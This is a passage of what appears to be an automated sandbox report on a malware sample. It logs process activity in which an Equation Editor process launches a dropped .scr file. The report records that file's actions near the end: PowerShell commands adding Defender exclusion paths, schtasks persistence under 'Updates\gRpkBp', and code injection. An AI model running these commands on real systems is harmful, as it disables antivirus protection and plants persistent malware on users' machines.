                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 280000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 2100000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 3C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 5F80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 6F80000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 71F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 81F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 200000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 23F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory allocated: 450000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 250000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 21C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 530000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 5F90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 6F90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 7380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 8380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 200000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 22F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory allocated: 450000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1497Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3203Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2444Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3048Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrWindow / User API: threadDelayed 1270Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrWindow / User API: threadDelayed 8516Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2631
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2087
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2582
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1909
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeWindow / User API: threadDelayed 9024
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeWindow / User API: threadDelayed 799
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3428Thread sleep time: -360000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3788Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3828Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 4028Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3360Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3360Thread sleep time: -3600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3368Thread sleep count: 1270 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3368Thread sleep count: 8516 > 30Jump to behavior
                Source: C:\Windows\System32\taskeng.exe TID: 4008Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3316Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 4044Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3296Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3420Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3412Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3412Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3408Thread sleep count: 9024 > 30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3408Thread sleep count: 799 > 30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Memory written: C:\Users\user\AppData\Roaming\swagodi78811.scr base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Memory written: C:\Users\user\AppData\Roaming\gRpkBp.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Queries volume information: C:\Users\user\AppData\Roaming\swagodi78811.scr VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
